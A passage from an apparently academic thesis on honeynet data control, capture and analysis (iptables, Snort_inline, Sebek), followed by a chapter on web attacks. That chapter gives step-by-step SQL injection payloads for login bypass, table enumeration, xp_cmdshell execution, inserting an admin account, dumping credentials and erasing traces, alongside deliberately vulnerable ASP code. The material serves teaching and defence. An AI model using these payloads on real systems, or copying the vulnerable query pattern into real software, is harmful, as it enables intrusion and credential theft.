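Jun 12 09:13:06 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.10 PROTO=TCP SPT=40003 DPT=445
Jun 12 09:13:07 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.11 PROTO=TCP SPT=40004 DPT=445
Jun 12 09:13:08 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.12 PROTO=TCP SPT=40005 DPT=445
Jun 12 09:20:00 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.11 DST=198.51.100.9 PROTO=TCP SPT=40100 DPT=443
Jun 13 00:00:05 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.9 PROTO=ICMP TYPE=8 CODE=0
"""

# Fields the firewall log records: timestamp, source/destination address,
# protocol and (for TCP/UDP) source/destination port.
LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+)"
    r"(?: SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+))?"
)


def parse_line(line, year=2012):
    """Turn one log line into a dict, or None if it is not a connection record.
    Syslog lines carry no year, so the caller supplies it (assumed 2012 here)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                           "%Y %b %d %H:%M:%S")
    return {"ts": ts, "src": m["src"], "dst": m["dst"], "proto": m["proto"],
            "dport": int(m["dpt"]) if m["dpt"] else None}


class OutboundLimiter:
    """Data control policy: anything inbound is allowed; outbound connections
    from a honeypot are allowed until that honeypot's daily limit is reached."""

    def __init__(self, limit_per_day=15):
        self.limit = limit_per_day
        self.count = defaultdict(int)   # (honeypot, date) -> outbound connections

    def decide(self, ev):
        if ev["src"] not in HONEYPOTS:
            return "ALLOW"              # inbound: let the attacker in
        key = (ev["src"], ev["ts"].date())
        if self.count[key] >= self.limit:
            return "BLOCK"              # limit reached: no more outbound today
        self.count[key] += 1
        return "ALLOW"


def apply_policy(log_text, limit_per_day=15):
    """Run the limiter over a log; returns (src, dst, dport, decision) tuples."""
    limiter = OutboundLimiter(limit_per_day)
    decisions = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        decisions.append((ev["src"], ev["dst"], ev["dport"], limiter.decide(ev)))
    return decisions


def blocked_count(decisions):
    return sum(1 for d in decisions if d[3] == "BLOCK")


if __name__ == "__main__":
    for src, dst, dport, verdict in apply_policy(SAMPLE_LOG, limit_per_day=3):
        print(f"{verdict:5} {src} -> {dst} dport={dport}")
```

With the limit set to 3, the fourth and fifth outbound connections from 10.0.1.10 on 12 June are blocked, while the other honeypot and the next day's connection are still allowed.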
2.1.3. Data control in Honeynet II

Honeynets have been developed through three generations: I, II and III. Essentially, all three generations control data in roughly the same way; however, Honeynet II and III contain a number of improvements over Honeynet I. We therefore analyse data control in Honeynet II to illustrate the Honeynet's data control module, which also shows the advanced improvements of Honeynet II compared with Honeynet I.

a) The IPTABLES firewall

Introduction: the Iptables firewall program was written by the Netfilter organisation to increase security on Linux systems. Iptables provides the following features:

* Good integration with the Linux kernel.
* Efficient packet analysis.
* Filtering of packets based on MAC address and some flags in the TCP header.
* Detailed options for logging system events.
* NAT functionality.
* The ability to block some DoS-style attacks.

Packet handling in iptables: Iptables checks every packet as it passes through the iptables host; this check is performed sequentially from the first entry to the last. There are three kinds of tables in iptables:

* Mangle table: responsible for modifying the quality-of-service bits in the TCP header. This table is typically used in SOHO (Small Office/Home Office) setups.
* Filter queue: responsible for packet filtering; it has three built-in chains that implement the firewall policy rules:
  - Forward chain: allows packets from a source to pass through the firewall.
  - Input chain: allows packets coming into the firewall.
  - Output chain: allows packets going out from the firewall.
* NAT queue: implements NAT (Network Address Translation), providing the following two built-in chains:
  - Pre-routing chain: NAT from outside into the internal network. NAT is performed before the routing mechanism runs. This is convenient for changing the destination address to one that matches the firewall's routing table; in configuration the keyword DNAT describes this technique.
  - Post-routing chain: NAT from inside to outside. NAT is performed after routing. This process changes the source address of the packet. The technique is called one-to-one or many-to-one NAT, also known as Source NAT or SNAT.

For an overview of packet filtering and processing in iptables, see the following figure:

Figure 2.7 - Packet filtering and processing in IPtables

In the Honeynet system, IPtables plays a very important role in data control: it limits the number of outbound connections, letting the hacker attack into the Honeynet while preventing the hacker from turning the Honeynet into a tool or stepping stone for attacks on the production network and other external networks. Figure 2.8 below describes the Honeynet's data control process:

Figure 2.8 - Data control diagram

The IPTABLES data control process: after the hacker has broken into the Honeynet and gained control of a honeypot, the hacker will try to keep using the honeypot as a tool to attack external networks, for example with brute-force dictionary attacks or system scanning attacks. Carrying out these attacks requires opening a large number of connections from the honeypot to the outside. However, because the IPTABLES firewall limits the number of outbound connections, the hacker cannot carry out these attacks successfully.

b) Snort IDS

Introduction: Snort is one of the most widely used intrusion detection system (IDS) products today. Snort contains a set of rules defining the signatures of known attack techniques. Snort inspects the content of packets and compares it with its database of attack patterns (the rules). When it detects signs of an attack, Snort can react in various ways depending on the configuration we set up; for example, it can send an alert message to the administrator or drop the packet when it detects an anomaly in it.
However, Snort also has a weakness. Like virus scanners, Snort can only counter attacks effectively if it knows their signatures. Exploiting this, skilled hackers can adjust their attacks to change the attack's signature, and such attacks can then slip past Snort's monitoring. It is therefore clear that, for Snort to work effectively, one of the important factors to pay attention to is the rules written for Snort. When Snort runs, it reads the rule files, monitors the traffic flowing through the system, and reacts if any traffic matches its rule set. More specifically, rules can be created to monitor scanning attempts, footprinting, or the many other methods hackers use to try to take over a system. These rules can be written by the user, or the user can download them from the Snort home page at http://www.snort.org.

Role and operation of Snort in the Honeynet: in the Honeynet's data control, Snort plays a very important role, performing the task of filtering malicious packets. Looking at the Honeynet data control diagram (Figure 2.3) above: after the hacker has broken into the Honeynet and gained control of a honeypot, the hacker will try to keep using the honeypot as a tool to attack external networks, for example with brute-force dictionary attacks or system scanning attacks. Working together with IPTABLES, Snort stops these attack attempts by filtering the malicious packets the hacker generates. When a malicious packet is detected, Snort either changes the packet content so that it becomes harmless or blocks the packet.

In the Honeynet system, Snort's functionality is upgraded to a higher level, Snort_inline. Snort_inline improves on Snort in that it only inspects the content of packets after they have passed through Iptables (whereas Snort listens to packets on a specified interface and uses the pre-set rules to determine whether there is an intrusion or destructive activity; because it listens to all arriving packets, its processing is rather slow). This reduces the number of packets to be processed and increases processing speed. The IPtables firewall passes packets into a queue (QUEUE), and Snort_inline opens each packet to check it and scrub the packets. Figure 2.4 below shows this operation of Snort_inline:

Figure 2.9 - Operation of Snort_inline

Packet dropping mechanism: Figure 2.5 below shows that, on their way from the honeypot to the outside, packets must pass the checks of the IPTABLES firewall; specifically, IPTABLES uses its rules to check the validity of the packet. IPTABLES then places the valid packets into the queue so that Snort_inline can check them once more. Snort inspects the content of these packets and compares it with the attack patterns stored in the database. When it detects an attack signature, Snort asks IPtables to block the packet so that it cannot leave. This measure is simple to implement but inflexible and easily arouses the hacker's suspicion.

Figure 2.10 - How Snort_inline works

Packet replacement mechanism: this mechanism is basically the same as the packet dropping mechanism, the only difference being that when an attack is detected, instead of asking IPtables to block and drop the packet, Snort_inline replaces or modifies the content inside the packet so that it becomes harmless to the external system. Snort_inline changes a few bytes inside the exploit code, rendering it ineffective, and allows it to continue outward. The hacker sees the attack launched as intended. This measure gives us better control over the intruder's behaviour and is very flexible, making it harder for the hacker to detect.

In summary, the data control module plays a very important role in the Honeynet: it controls the data leaving the system, controls the attacker's activity, and helps prevent the attacker from using the Honeynet network to attack or damage other external systems.

2.2. Data capture module

2.2.1. Role and tasks of the data capture module

Data capture aims to discover the hacker's intrusion and attack techniques, tools and goals, and at the same time to discover system vulnerabilities. It plays an extremely important role in the Honeynet: without the data capture module, the Honeynet cannot fulfil the purpose for which it was built and has no value.
The data capture module monitors and records the attacker's actions inside the Honeynet. These actions are organised into basic data and are the core of research and analysis. To capture a lot of data and collect complete, detailed information on the attacker's actions, many different data capture mechanisms are needed. This module uses several different mechanisms to capture several different kinds of data. Data capture can be performed by methods such as:

* Capturing data from the firewall
* Capturing data from the network traffic
* Capturing data from the activity of the honeypots in the system

For the Honeynet to work well, the requirements on the data capture module are:

* Capture as much data as possible
* Ensure accuracy and availability
* Remain hidden from the hacker

2.2.2. Data capture mechanism

To meet the data capture requirements, the data capture module captures data in the Honeynet on three layers:

+ Capture from the firewall (using the firewall log).
+ Capture from the network traffic (with the Snort tool).
+ Capture from the activity of the honeypots in the system (with the Sebek client-server).

These three mechanisms can be seen clearly in the data capture diagram below:

Figure 2.11 - Data capture diagram

a) Capturing data from the firewall

The firewall allows very good data capture because all traffic must pass through it. The information recorded by the firewall includes:

* The source IP address of the packet (possibly the IP address of the hacker's machine).
* The destination IP address of the packet (usually the address of a honeypot).
* The communication protocol used (usually the protocol of one of the network services the honeypot was built with for the hacker to attack).
* The source port of the packet.
* The destination port of the packet (usually the port number of one of the network protocols the Honeynet opens to let the hacker attack).
* The time the attack took place (based on the packet's timestamp).

Below is part of a firewall log file, which records all of the above information:

Figure 2.12 - Log used for data capture on the Honeynet

b) Capturing data from the network traffic

Capturing data from the network traffic means capturing every packet, with its full payload, entering or leaving the Honeynet system. In the Honeynet this capture layer is implemented by Snort (integrated into the Honeywall), configured to capture all packets on the network (listening on the network interface). Snort captures packets on the network using the supporting library Libpcap (on Linux) or Winpcap (on Windows). Snort's most important role is to capture all network traffic into and out of the Honeynet system. Snort is used to capture and record every packet and its payload on the wire. From the data capture diagram (Figure 2.7) we see that Snort listens on the whole network to capture and inspect the content of all packets passing through it.

c) Capturing data from activity on the honeypots

The task of the data capture module is to record all of the hacker's activity while interacting with the Honeynet system. The interaction activities for which information is collected can be divided into four levels:

* Network-level activity
* System-level activity
* Application-level activity
* User-level activity

The two capture layers presented above (capturing from the firewall and from the network traffic) capture network-level activity. This third capture layer captures system-level, application-level and user-level activity. It is the main data capture layer in the Honeynet. To capture data from the honeypots, the Honeynet uses the Sebek client-server tool. The Sebek server is integrated into the Honeywall, while the Sebek client is a program that works like a rootkit, installed on the honeypot; it can hide processes, files and data in the registry (on Windows), records network connection parameters, monitors all activity and network connections of the honeypot, and reports the collected information back to the Sebek server. In short, Sebek is a tool that records the hacker's activity on the honeypots, including the hacker's keystrokes, and works in a client-server model.

Sebek operating model: the Sebek operating model is shown below:

Figure 2.13 - Sebek operating model

Sebek works in a client-server model. In this model, the Sebek client component is installed on the honeypots, while the Sebek server component is built into the Honeywall. When the attacker intrudes into the honeypots, the Sebek client collects all the information about the hacker's activity and sends it to the Sebek server on the Honeywall, where the collected information is analysed. We now look in detail at the role and operation of each component, the Sebek client and the Sebek server.

Sebek client:

* The Sebek client uses rootkit techniques, that is, it works like a rootkit: it can hide processes, files and data in the registry (on Windows), records network connection parameters, and monitors all activity and network connections of the honeypots.
* The Sebek client is installed on the honeypots and resides entirely in the operating system kernel. There are versions for Windows (Sebek-Win32-3.0.4.zip) and for Linux (sebek-linux-3.0.3).
* The Sebek client performs the following tasks:
  - Data capture:
    o Captures all activity data through the read() function
    o Replaces the read() function in the System Call Table with a new read() function
    o The new read() function calls the old read() and at the same time copies the data into the packet buffer
    o Adds a header and sends to the Sebek server

This data capture process of the Sebek client is shown in the figure below:

Figure 2.14 - Sebek client data capture

  - Transmitting packets to the Sebek server: after collecting the data, the Sebek client sends it to the Sebek server on the Honeywall. To send data to the Sebek server, the Sebek client packages the data into sebek packets. These sebek packets all share one destination IP address; this IP address is the handshake parameter for communication between the Sebek client and the Sebek server. In other words, the destination IP address on all sebek packets is the parameter that lets the Honeywall recognise sebek packets and capture them. This IP address is declared when installing the Honeywall and when installing the Sebek client on the honeypot. By default, the Honeywall sets this address to 10.0.0.253; however, it can be changed to another IP address. This is shown in the Honeywall and Sebek client installation and configuration sections in Chapter IV.

Sebek server:

* The Sebek server is installed and configured on the Honeywall and receives the collected data sent from the Sebek client.
* The Sebek server uses the following tools:
  - The sbk_extract tool extracts sebek data from the network traffic.
  - The sbk_ks_log.pl tool extracts keystrokes and writes them to standard output.
  - The sbk_upload.pl tool uploads sebek data into the database.

In summary, the data capture module captures data in order to discover the hacker's intrusion and attack techniques, tools and goals, and at the same time to discover system vulnerabilities. It plays an extremely important role in the Honeynet: without the data capture module, the Honeynet cannot fulfil the purpose for which it was built and has no value.

2.3. Data analysis module

2.3.1. Role

The role of the data analysis module in the Honeynet is to support the analyst in screening and condensing the data to remove redundant data, and in easily finding correlations between the data so as to discover the central issues to be analysed (such as data related to the hacker's attack, intrusion or illegal activity). It supports the analysis of the captured data in order to determine the hacker's attack techniques, tools and goals, thereby helping the administrator devise timely countermeasures. If the attacker uses a new attack technique or a new attack tool against the Honeynet system, the Honeynet retains all of the data on the hacker's attack process. The administrator can then use this data to analyse and work out the mechanism, goal, tools and method of the attack, and can even build new attack signatures to update the IDS so that it detects this new attack if it is encountered again. The Honeynet provides tools such as Hflow and Walleye to help the administrator easily analyse and find out the hacker's attack mechanism, goal, tools and method.

2.3.2. Data analysis mechanism

The Honeynet provides the following two tools for the data analysis process:

* One is Hflow: capable of automatically combining data.
* The other is Walleye: capable of reporting and statistics through a user-friendly web interface.

Both tools are built into the Honeywall. Below is the Honeywall architecture diagram:

Figure 2.15 - Honeywall architecture diagram

According to this architecture diagram, Hflow and Walleye perform data analysis as follows:

Hflow: Hflow's task is to combine the data sent from the data capture module, normalise it, and then store it in the database (here MySQL). Hflow automatically determines:

- The operating system that initiated the network connection.
- IDS events related to the network connection.
- IDS events related to processes and users on the honeypot.
- The list of files related to the attack.

Walleye: Walleye's task is to take the collected data normalised by Hflow from the database and present it to the analyst through a web interface. In this way the analyst can grasp the overall picture of system activity and the details of activity on the network. Below is the Walleye interface:

Figure 2.16 - The Walleye interface

In summary, this module's task is to support the analyst in screening and condensing the data to remove redundant data, and to support the analysis of the captured data in order to determine the hacker's attack techniques, tools and goals, thereby helping the administrator devise timely countermeasures.

Conclusion: this chapter presented the architecture model and operating principles of the Honeynet system, giving a deeper understanding of how the Honeynet works and operates.

Chapter III SOME WEB SERVICE ATTACK TECHNIQUES

Today, as the Internet has become widespread, organisations and individuals all wish to present their information on the information superhighway and to carry out online transactions. The problem that arises is that as the scope of web applications expands, the likelihood of errors and attacks also increases, and they become targets for many attackers with different motives, sometimes simply to test their skills or to show off to others. Along with the continuous growth of the Internet and its services, the number of attacks on the Internet has grown exponentially. While the mass media increasingly talk about the information access possibilities of the Internet, specialist literature has begun to address the problem of ensuring security and data safety for computers connected to the Internet. A total of 64.2 million virus infections of computers in Vietnam is the 2011 figure from Bkav's virus monitoring system, an average of more than 175 thousand infected computers a day. In 2011, 38,961 new virus strains appeared, the most widespread being W32.Sality.PE, which infected 4.2 million computers. In Vietnam itself, the 2007 network security summary from the BKIS Network Security Centre showed that 342 websites in Vietnam were attacked, 118 of them by domestic hackers and 224 by foreign hackers. The most recent was the website attack and domain hijacking at the hosting provider Pavietnam, which affected not only that company's website but also thousands of websites of other companies hosted at PAvietnam. 2011 was the year of network attacks. Attacks of various kinds on the systems of organisations and businesses in Vietnam occurred one after another. There were intrusion attacks that destroyed databases or defaced websites. There were also DDoS attacks that paralysed systems for long periods. Domain name theft attacks on businesses also occurred repeatedly. More dangerously, many silent attacks appeared that installed spyware viruses to steal documents from important agencies.

Most of the attacks have their root cause in the awareness of the leadership of agencies and businesses of the importance of network security, leading to scattered investment and the lack of an overall solution for system security. Notable in 2011 was the case of more than 85,000 computers in Vietnam being infected with the Ramnit virus, which steals important data. This shows that attacks can even affect national security. Not only in Vietnam: this botnet was controlled by hackers through many servers in the USA, Russia, Germany and China to steal information worldwide. This was a common situation around the world in 2011. According to the figures published for 2011 by the Web Hacking Incident Database (WHID), many different attack methods exist, but SQL Injection and XSS are the most common. Up to 18.87% of attacks targeted SQL Injection vulnerabilities and 12.58% were XSS. A further 8.06% were denial-of-service attacks, with many other kinds of attack making up the rest.

Figure 2.17 - Attack methods in 2011

Within the scope of the thesis "Research on Honeypot and Honeynet systems", whose purpose is to collect web service attack techniques, this chapter presents some web service attack techniques that are common today, so that we can easily understand and recognise the techniques and tricks of web attacks when hackers attack our Honeynet system, and from there propose countermeasures to protect the web service.

Basic attack techniques. Web service security threats

Below is a brief introduction to the security threats and web attack techniques, classified by the degree of harm done to the application and to the user.

Session management attacks: this technique is divided into two kinds:

1.1.1.1. Session fixation
A technique that lets the hacker impersonate a legitimate user by sending a valid session ID to the user; after the user successfully logs in to the system, the hacker reuses that session ID and thereby becomes a legitimate user.

1.1.1.2. Session hijacking
A technique that lets the hacker impersonate a legitimate user after the victim logs in to the system, by decoding the victim's session ID stored in a cookie, URL parameter or hidden form field.

Exploiting the lack of input validation: the hacker exploits input fields to send an arbitrary piece of code, causing the system to execute the command or be completely compromised.

1.1.1.3. Validating data with browser-side languages (client-side validation)
Because browser-side languages (JavaScript, VBScript, ...) are executed in the browser, the hacker can modify the source code to disable the check.

1.1.1.4. Buffer overflow
An amount of data sent to the application exceeds the allocated memory, so that the application cannot execute the next intended instruction and instead executes arbitrary code injected by the hacker. This is more serious if the application is configured to run with root privileges on the system.
1.1.1.5. Path traversal
A method that exploits the path used to access a file in a URL that returns a result to the browser, allowing the hacker to obtain the content of any file on the system.

1.1.1.6. Injecting script executed in the victim's browser (Cross-Site Scripting)
This attack technique mainly targets information on the user's computer rather than the server system. By adding an arbitrary piece of code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal important information such as cookies and thereby become a legitimate user of the application based on the stolen information. Cross-site scripting is also a form of session hijacking attack.

1.1.1.7. SQL injection
In programming with databases, the programmer's mistakes in checking input values let the hacker add queries or invalid values in order to easily log in to the system.

Denial of service (DoS): a large volume of requests is sent to the application in a given period of time, so that the system cannot respond to the requests in time and collapses.

Because the scope and time of the thesis are limited, it only studies some attack techniques that are common and capable of damaging a network system to a high degree. In the sections of the second part, the thesis presents the following techniques in more detail:

* SQL Injection attacks
* Denial-of-service (DoS) attacks
* Cross-site Scripting (XSS) attacks

SQL Injection attacks

The concept of SQL Injection

When deploying web applications on the Internet, many people still think that ensuring security in order to minimise the chance of being attacked by hackers simply means focusing on issues such as the choice of operating system, database management system and web server that run the application, forgetting that the application itself running on them also harbours very large security holes. One of these holes is SQL Injection. In Vietnam, there was a period in which website administrators concerned themselves with scanning for viruses and applying patches to system software, while care for bugs in the applications received very little attention. That is why, in the recent period, quite a few websites in Vietnam have been attacked, most of them by SQL Injection.

So what is SQL Injection? SQL injection is a technique that allows attackers (hackers) to exploit holes in input validation in web applications and the error messages of the database management system in order to "inject" and execute illegitimate SQL statements (not anticipated by the application developer). Its consequences are very harmful, allowing attackers to take control of the website. This flaw usually occurs in web applications whose data is managed by database management systems such as SQL Server, MySQL, Oracle, DB2 and Sybase. In essence, this is a flaw that exists in the database management systems (SQL Server, MySQL, Oracle, ...); however, we can remedy it by validating the data entered into the web application.

Common forms of attack

1.1.1.8. Attacks that bypass the login check

With this form of attack, the hacker can easily bypass login pages thanks to flaws in the use of SQL statements that operate on the web application's database. Consider a typical example: normally, to allow users to access protected web pages, the system builds a login page that asks the user to enter a user name and password. After the user enters the information, the system checks whether the user name and password are valid to decide whether to allow or refuse further access. In this case two pages can be used, an HTML page that displays the input form and an ASP page that processes the information entered by the user. For example:

login.htm

  <form action="ExecLogin.asp" method="post">
  Username: <input type="text" name="fUSRNAME"><br>
  Password: <input type="password" name="fPASSWORD"><br>
  <input type="submit">
  </form>

execlogin.asp

  <%
  Dim vUsrName, vPassword, objRS, strSQL
  vUsrName = Request.Form("fUSRNAME")
  vPassword = Request.Form("fPASSWORD")
  ' The user input is concatenated straight into the SQL text: this is the flaw discussed below
  strSQL = "SELECT * FROM T_USERS " & _
      "WHERE USR_NAME='" & vUsrName & _
      "' and USR_PASSWORD='" & vPassword & "'"
  Set objRS = Server.CreateObject("ADODB.Recordset")
  objRS.Open strSQL, "DSN=..."
  If (objRS.EOF) Then
      Response.Write "Invalid login."
  Else
      Response.Write "You are logged in as " & objRS("USR_NAME")
  End If
  Set objRS = Nothing
  %>

At first glance, the code in execlogin.asp does not seem to contain any security hole. The user cannot log in without a valid user name and password. However, this code is really not safe, and it is the premise for an SQL injection flaw. In particular, the weak point lies in the fact that the user's input is used directly to build the SQL statement. This is what allows attackers to control the query that will be executed. For example, if the user enters the following string into both the username and password fields of login.htm: ' OR ''=', then the query that is executed becomes:
  SELECT * FROM T_USERS WHERE USR_NAME='' OR ''='' and USR_PASSWORD='' OR ''=''

The comparison above is always true (because the empty string always equals the empty string), so the condition in the WHERE clause is always true. The user name of the first row in the table is selected. Thus this query is valid and returns all records of T_USERS, and the following code treats this illegitimate login as a legitimately logged-in user. In addition, the injected SQL-injection string usually contains the special characters of SQL:

- the character ; : marks the end of a query
- the characters -- : hide the characters that follow them on the same line
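The login query above rebuilt with Python's sqlite3, as an added example that is not part of the thesis: first with the same string concatenation as execlogin.asp, then with a parameterized query, so that the ' OR ''=' input can be run against both forms. The T_USERS rows are constructed sample data.

```python
import sqlite3

# Constructed sample accounts (not from the thesis). Passwords are kept in
# clear text only to mirror the T_USERS table used by execlogin.asp.
SAMPLE_USERS = [("admin", "s3cret"), ("alice", "alice-pw")]


def make_db():
    """In-memory T_USERS table with the columns execlogin.asp queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_USERS (USR_NAME TEXT, USR_PASSWORD TEXT)")
    conn.executemany("INSERT INTO T_USERS VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(username, password):
    """The same concatenation as execlogin.asp: the input becomes SQL text."""
    return ("SELECT USR_NAME FROM T_USERS WHERE USR_NAME='" + username
            + "' and USR_PASSWORD='" + password + "'")


def login_concatenated(conn, username, password):
    """Vulnerable form. Returns the user names the query matched; the ASP
    page logs the caller in as the first of them."""
    return [row[0] for row in conn.execute(build_vulnerable_sql(username, password))]


def login_parameterized(conn, username, password):
    """Hardened form: the input travels as bound parameters, so quote
    characters inside it are compared as data and never parsed as SQL."""
    sql = "SELECT USR_NAME FROM T_USERS WHERE USR_NAME=? and USR_PASSWORD=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    bypass = "' OR ''='"
    print(build_vulnerable_sql(bypass, bypass))
    print(login_concatenated(conn, bypass, bypass))   # every user: check bypassed
    print(login_parameterized(conn, bypass, bypass))  # []: no such user
    print(login_parameterized(conn, "alice", "alice-pw"))
```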

Another example that uses SQL special characters to penetrate the system is as follows:

  Username: admin'--
  Password:

The SQL statement becomes:

  SELECT tkUsername FROM User WHERE tkUsername='admin'-- AND Password='" & tkPassword & "'

We can see that the statement above allows logging in to the system as admin without requiring a password (because the part after -- is hidden and not executed). In short, the login-bypass attack is the most basic form of attack, which lets the hacker get past login pages thanks to flaws in the use of SQL statements that operate on the web application's database.

1.1.1.9. Attacks using the SELECT statement

This form of attack is more complex. To carry it out, the attacker must be able to understand and exploit flaws in the system's error messages in order to find weaknesses from which to start the attack. Consider a very common example in news websites. Usually there is a page that receives the ID of the news item to display and then queries the content of the item with that ID, for example http://www.victim.com/shownews.asp?ID=123. The source code for this function is usually written quite simply in the following form:

  <%
  Dim vNewsID, objRS, strSQL
  vNewsID = Request("ID")
  ' The ID is concatenated unquoted and unchecked into the statement
  strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID
  Set objRS = Server.CreateObject("ADODB.Recordset")
  objRS.Open strSQL, "DSN=..."
  Set objRS = Nothing
  %>

In normal situations, this code displays the content of the item whose ID matches the specified ID and appears to have no bugs. However, just like the login example earlier, this code is open to another SQL injection flaw. The attacker can replace a valid ID by assigning ID some other value, and from there start an illegitimate attack, for example 0 OR 1=1 (that is, http://www.victim.com/shownews.asp?ID=0 or 1=1). The SQL query then returns all articles from the table, because it executes the statement:

  SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1

Another case is, for example, a search page. This page lets the user enter search information such as first name and last name; the common code is:

  <%
  Dim vAuthorName, objRS, strSQL
  vAuthorName = Request("fAUTHOR_NAME")
  strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME='" & _
      vAuthorName & "'"
  Set objRS = Server.CreateObject("ADODB.Recordset")
  objRS.Open strSQL, "DSN=..."
  .............
  Set objRS = Nothing
  %>
Similarly, an attacker can exploit the gap in the SQL query by entering the following string in the author-name field:

' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '=' (*)

Now, in addition to the first query, which does not succeed, the program also executes the statement that follows the UNION keyword. Of course the examples above seem harmless, but imagine that the attacker could delete the entire database by inserting dangerous statements such as DROP TABLE, for example:

' DROP TABLE T_AUTHORS

So how do we know whether a web application has this flaw? Very simply: enter the string (*) above, and if the system reports a syntax error such as "Invalid object name 'OtherTable'", we can be sure the system executed the SELECT after the UNION keyword, since only then could it return the error we deliberately provoked in that SELECT. We can also learn the names of the tables in order to carry out destructive operations when the web application has a SQL injection flaw. This too is simple, because in SQL Server two objects, sysobjects and syscolumns, list all the table and column names in the system. We need only adjust the SELECT statement, for example:

' UNION SELECT name FROM sysobjects WHERE xtype = 'U'

to list the names of all tables.

1.1.1.10. Attacks using the INSERT statement

Web applications usually let users register an account in order to participate. An indispensable function is that after successful registration the user can view and edit their own information. SQL injection can be used when the system does not check the validity of the data entered. For example, an INSERT statement may have the syntax INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement has the form:

<%
strSQL = "INSERT INTO TableName VALUES('" & strValueOne & "', '" & strValueTwo & "', '" & strValueThree & "')"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
.................
Set objRS = Nothing
%>

then this code has a SQL injection flaw, because if we enter, for example, ' + (SELECT TOP 1 FieldName FROM TableName) + ' in the first field, the query becomes:

INSERT INTO TableName VALUES('' + (SELECT TOP 1 FieldName FROM TableName) + '', 'abc', 'def')

When the view-information command is then executed, it is as if we had asked for one more statement to be run as well: SELECT TOP 1 FieldName FROM TableName.

1.1.1.11. Attacks using stored procedures

Stored procedures are used in web programming to reduce application complexity and to avoid SQL injection attacks. Nevertheless a hacker can still abuse stored procedures to attack the system. Attacking through stored procedures does very great damage if the application runs with the 'sa' system administrator account. For example, if the injected code is changed to the form ' ; EXEC xp_cmdshell cmd.exe dir C: ', the system will execute a directory listing of the C:\ drive on which the server is installed. What kind of damage is done depends on the command that follows cmd.exe.

1.1.1.12. Attacks based on HAVING, GROUP BY and UNION

The SELECT statement is used to retrieve information from the database. Usually the place where something can be appended to a SELECT clause is after WHERE. To return more rows of information from the table, the condition in the WHERE clause is altered by appending UNION SELECT. For example:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername like
% & tName & UNION SELECT tkPassword from User

The statement above returns a result set that is the combination of tkUsername with tkPassword from the User table. Note: the number of columns in the two SELECT statements must match, that is, the original SELECT and the appended UNION SELECT must have the same number of columns, of the same types. The syntax error returned after appending the UNION statement reveals the type of each field.

The following is an example of how an attacker exploits the contents of the database using HAVING, GROUP BY and UNION. The query used for login is:

SQL Query=SELECT tkUsername,tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'

First, to learn the table and field names the query uses, a HAVING condition is used, as in the following example.

Input value:
Username: ' having 1=1--

Error produced:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

From this error we learn that the table used in the query is User and that it contains a field named tkUsername. Next GROUP BY is used:

Username: ' group by User.tkUsername having 1=1--

Error produced:
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

So tkPassword is a field of the User table and is used in the query. GROUP BY is applied repeatedly until all the fields of the User table that take part in the query are known. Once no more GROUP BY syntax errors are reported, the next stage is to check the type of each field in the table. UNION is used for this:

Username: ' union select sum(tkUsername) from User--

The sum function adds up the argument inside the parentheses, which must be numeric. If the argument is not numeric, the following error is produced:

[Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a varchar data type as an argument.

Given the error message above, tkUsername must be of type varchar. By this method the type of each field in the table is easily determined. Having gathered all this information, the hacker can easily add their own data to the User table:

Username: '; insert into User(tkUsername,tkPassword) values ('admin', '')--

The attacker has now inserted an admin account with no password and can use it to log in. Whether the attacker can thereby take over administration of the website depends on its level of security. In addition, the attacker can carry out the following steps to extract the contents of the User table, specifically the username/password pairs already stored in it.

Step 1: Create a stored procedure that copies all the values of the two fields tkUsername and tkPassword of the User table into a single string, stored in a new table foo with one field ret, using the following code:

create proc test as
begin
  declare @ret varchar(8000)
  set @ret=':'
  select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
  select @ret as ret into foo
end

The statement is executed by entering it in the form:
Username: '; create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end--

Step 2: Call the stored procedure. After the stored procedure has been created as above, it is invoked with:

Username: ';exec test--

Step 3: Use UNION to view the contents of table foo:

Username: ';select ret,1 from foo union select 1,1 from foo--

After this statement runs, the following error is produced:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] error converting the varchar value ': admin/passof map/nhimmap minhthu/kmathu' to a column of data type int.

After these steps the hacker has obtained the contents of the User table, both the tkUsername names and the tkPassword passwords.

Step 4: The hacker may also carefully drop the table foo to remove traces:

Username: '; drop table foo--

There is another way to determine the contents of the User table:

